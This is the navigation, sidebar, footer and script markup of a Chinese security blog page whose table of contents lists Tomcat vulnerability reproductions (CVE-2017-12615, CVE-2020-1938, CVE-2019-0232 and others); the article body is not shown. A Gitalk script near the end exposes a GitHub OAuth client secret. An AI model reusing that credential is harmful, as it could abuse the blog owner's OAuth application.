class="toc-number">1.3.1.</span> <span class="toc-text">漏洞介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0-1"><span class="toc-number">1.3.2.</span> <span class="toc-text">复现</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RCE-CVE-2019-0232"><span class="toc-number">1.4.</span> <span class="toc-text">RCE (CVE-2019-0232)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0-1"><span class="toc-number">1.4.1.</span> <span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0-2"><span class="toc-number">1.4.2.</span> <span class="toc-text">复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.4.3.</span> <span class="toc-text">原理</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Tomcat-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-CVE-2016-8735"><span class="toc-number">1.5.</span> <span class="toc-text">Tomcat 反序列化漏洞 (CVE-2016-8735)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0-2"><span class="toc-number">1.5.1.</span> <span class="toc-text">漏洞描述</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A0%B7%E4%BE%8B%E7%9B%AE%E5%BD%95session%E6%93%8D%E6%8E%A7%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.6.</span> <span class="toc-text">样例目录session操控漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A3%80%E6%B5%8B%E9%93%BE%E6%8E%A5"><span class="toc-number">1.6.1.</span> <span class="toc-text">检测链接</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88"><span class="toc-number">1.7.</span> <span class="toc-text">其他漏洞集合</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">45</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">6</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">69</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
      
      
        <div class="sidebar-btn-wrapper" style="position:static">
          <div class="sidebar-toc-btn current"></div>
          <div class="sidebar-common-btn"></div>
        </div>
      
    </div>
  </div>

  
</aside>

          
        </div>
        <footer id="footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    
    <div>
      <span class="icon-copyright"></span>
      2023-2024
      <span class="footer-info-sep"></span>
      Yyjccc
    </div>
    
      <div>
        基于&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" target="_blank">Reimu</a>
      </div>
    
    
      <div>
        <span class="icon-brush"></span>
        154.6k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        10:30
      </div>
    
    
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
    
  </div>
</footer>

        <div class="sidebar-top">
          <img src="/images/taichi.png" height="50" width="50" alt="backtop" />
          <div class="arrow-up"></div>
        </div>
        <div id="mask"></div>
      </div>
      <nav id="mobile-nav">
  <div class="sidebar-wrap">
    
      <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">文章目录</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Tomcat-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E9%9B%86%E5%90%88"><span class="toc-number">1.</span> <span class="toc-text">Tomcat 漏洞复现集合</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Tomcat-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%EF%BC%88CVE-2017-12615"><span class="toc-number">1.1.</span> <span class="toc-text">Tomcat 任意文件写入（CVE-2017-12615</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%80%E4%BB%8B"><span class="toc-number">1.1.1.</span> <span class="toc-text">简介</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.1.2.</span> <span class="toc-text">复现</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96-%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2020-1938%EF%BC%89"><span class="toc-number">1.2.</span> <span class="toc-text">文件读取&#x2F;包含漏洞（CVE-2020-1938）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">1.2.1.</span> <span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6"><span class="toc-number">1.2.2.</span> <span class="toc-text">条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#poc"><span class="toc-number">1.2.3.</span> <span class="toc-text">poc</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Tomcat%E5%BC%B1%E5%8F%A3%E4%BB%A4-war%E8%BF%9C%E7%A8%8B%E9%83%A8%E7%BD%B2"><span class="toc-number">1.3.</span> <span class="toc-text">Tomcat弱口令&amp;war远程部署</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.3.1.</span> <span class="toc-text">漏洞介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0-1"><span class="toc-number">1.3.2.</span> <span class="toc-text">复现</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RCE-CVE-2019-0232"><span class="toc-number">1.4.</span> <span class="toc-text">RCE (CVE-2019-0232)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0-1"><span class="toc-number">1.4.1.</span> <span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0-2"><span class="toc-number">1.4.2.</span> <span class="toc-text">复现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.4.3.</span> <span class="toc-text">原理</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Tomcat-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-CVE-2016-8735"><span class="toc-number">1.5.</span> <span class="toc-text">Tomcat 反序列化漏洞 (CVE-2016-8735)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0-2"><span class="toc-number">1.5.1.</span> <span class="toc-text">漏洞描述</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%A0%B7%E4%BE%8B%E7%9B%AE%E5%BD%95session%E6%93%8D%E6%8E%A7%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.6.</span> <span class="toc-text">样例目录session操控漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A3%80%E6%B5%8B%E9%93%BE%E6%8E%A5"><span class="toc-number">1.6.1.</span> <span class="toc-text">检测链接</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88"><span class="toc-number">1.7.</span> <span class="toc-text">其他漏洞集合</span></a></li></ol></li></ol>
      
  </div>
</div>
</div>
      <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Yyjccc" class="lazyload">
  <div class="sidebar-author-name">Yyjccc</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">45</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">6</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">69</div>
  </div>
</div>
<div class="sidebar-social">
  
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/Yyjccc itemprop="url" target="_blank" aria-label="github"></a>
    </div>
  
</div>
<div class="sidebar-menu">
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">首页</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/archives" aria-label="归档"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">归档</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/about" aria-label="关于"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">关于</div>
    </div>
  
    <div class="sidebar-menu-link-wrap">
      <a class="sidebar-menu-link-dummy" href="/friend" aria-label="友链"></a>
      <div class="sidebar-menu-icon icon-taichi"></div>
      <div class="sidebar-menu-link">友链</div>
    </div>
  
</div>
</div>
    
  </div>
  
    <div class="sidebar-btn-wrapper">
      <div class="sidebar-toc-btn current"></div>
      <div class="sidebar-common-btn"></div>
    </div>
  
</nav>

    </div>
    
      <div class="site-search">
        <div class="reimu-popup popup">
          <div class="reimu-search">
            <div class="reimu-search-input-icon"></div>
            <div class="reimu-search-input" id="reimu-search-input"></div>
            <div class="popup-btn-close"></div>
          </div>
          <div class="reimu-results">
            <div id="reimu-stats"></div>
            <div id="reimu-hits"></div>
            <div id="reimu-pagination" class="reimu-pagination"></div>
          </div>
          <img class="reimu-bg" src="/images/reimu.png"/>
        </div>
      </div>
    
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js"></script>



<script src="/js/script.js"></script>



  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>



<script src="/js/pjax_script.js" data-pjax></script>


<script type="module" data-pjax>
  import PhotoSwipeLightbox from "https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js";
  
  const pswp = () => {
    if (_$$('.article-entry a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-entry',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    if(_$$('.article-gallery a.article-gallery-item').length > 0) {
      new PhotoSwipeLightbox({
        gallery: '.article-gallery',
        children: 'a.article-gallery-item',
        pswpModule: () => import("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js")
      }).init();
    }
    window.lightboxStatus = 'done';
    window.removeEventListener('lightbox:ready', pswp);
  }
  if(window.lightboxStatus === 'ready') {
    pswp()
  } else {
    window.addEventListener('lightbox:ready', pswp);
  }
</script>






  
<script src="https://npm.webcache.cn/gitalk/dist/gitalk.min.js" data-pjax></script>

  
  <script data-pjax>
    var gitalkId = location.pathname;
    var gitalk = new Gitalk({
      clientID: '0efb4a442bc09d1ba17e',
      clientSecret: 'd26f520fef841de4f4388029a0d5c0f4730357cf',
      repo: 'https://github.com/Yyjccc/yyjccc.github.io.git',
      owner: 'Yyjccc',
      admin: "Yyjccc",
      id: gitalkId, // Ensure uniqueness and length less than 50
      distractionFreeMode: false // Facebook-like distraction free mode
    })
    if (document.getElementById('comments')) {
      gitalk.render('comments')
    }
  </script>







  
<script src="/js/generator_search.js" defer></script>






  
<script src="https://npm.webcache.cn/mouse-firework@0.0.4/dist/index.umd.js"></script>

  <script>
    firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["#ff5252","#ff7c7c","#ffafaf","#ffd0d0"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["#ff0000"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'))
  </script>





  <script>
    function initLive2d() {
      live2d.init("https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/", {themeTipsPath: ""});
    }
  </script>
  
<script src="https://fastly.jsdelivr.net/gh/D-Sketon/plugin-live2d/js/live2d-autoload.js" onload="initLive2d &amp;&amp; initLive2d()" async></script>




  
<script src="https://npm.webcache.cn/quicklink@2.3.0/dist/quicklink.umd.js"></script>

  <script data-pjax>
    quicklink.listen({
      timeout: 3000,
      priority: true,
      ignores: []
    });
  </script>


<div id="lazy-script">
  <div>
    
  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '0.3.0-alpha.1' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  

<script data-pjax>
  var updateTime = _$('#post-update-time')?.innerHTML;

  if (updateTime) {
    const update = new Date(updateTime);
    const now = new Date();
    const diff = now - update;
    const days = diff / 86400000;
    const { daysAgo, message: template } = window.outdate;
    if (days >= daysAgo) {
      const message = template.replace(/{time}/, updateTime);
      const blockquote = _$('#outdate-blockquote');
      if (blockquote) {
        blockquote.querySelector('p').innerText = message;
        blockquote.style.display = 'block';
      }
    }
  }
</script>


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --><!-- hexo-inject:begin --><!-- hexo-inject:end --><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true,"react":{"opacity":0.7}}});</script></body>
  </html>

